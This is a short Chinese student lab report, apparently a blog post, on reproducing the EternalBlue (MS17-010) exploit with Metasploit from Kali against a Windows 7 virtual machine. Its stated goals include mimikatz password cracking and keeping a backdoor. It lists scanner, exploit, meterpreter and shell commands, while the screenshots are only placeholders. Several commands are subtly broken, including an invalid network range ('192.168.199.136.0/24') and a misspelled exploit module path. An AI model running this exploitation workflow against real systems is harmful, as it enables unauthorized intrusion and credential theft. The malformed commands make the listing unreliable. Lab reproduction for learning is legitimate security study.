实验一:永恒之蓝攻击复现实验报告

姓名:软工女孩(b站同名)

一、实验项目名称
使用KALI进行MS17_010渗透提权

二、实验目的及要求

  1. 熟悉kali的基本安装与使用
  2. 理解软件msf的模块调用与使用
  3. 掌握MS17_010的模块的mimikatz软件使用
  4. 掌握windows的密码破解以及hash破解

三、实验环境
Windows、KALI

四、实验内容
5. 掌握永恒之蓝的使用以及msf模块的使用
6. 掌握基本提权与后门维持

五、实验步骤
1、搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。

2、分别打开两台虚拟机,在win7中打开cmd,查看ip地址
3、在Kali中打开终端,输入msfconsole
在这里插入图片描述

4、搜索永恒之蓝代号ms17_010
在这里插入图片描述

5、首先开始扫描局域网中存在的永恒之蓝的漏洞的电脑
在这里插入图片描述

6、填写需要扫描的网段并运行脚本
在这里插入图片描述

7、找到包含MS17-010(确定IP后面确定有ms17_010漏洞即可确定为漏洞)
8、调用攻击模块exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

9、调用meterpreter工具攻击
在这里插入图片描述

六、实验程序与实验结果
实验程序:(详细见实验步骤截图代码命令)
msfconsole
search 17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.199.136.0/24
run
use exploit/windows/smb/ms_010_eternalblue
meterpreter
shell

实验结果:
在这里插入图片描述
在这里插入图片描述

七、实验总结
通过本次实验我们学习复原了永恒之蓝的攻击原理及过程,初步熟悉了kali工具的基本使用,但对于代码的理解和运用仍需继续学习加强。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值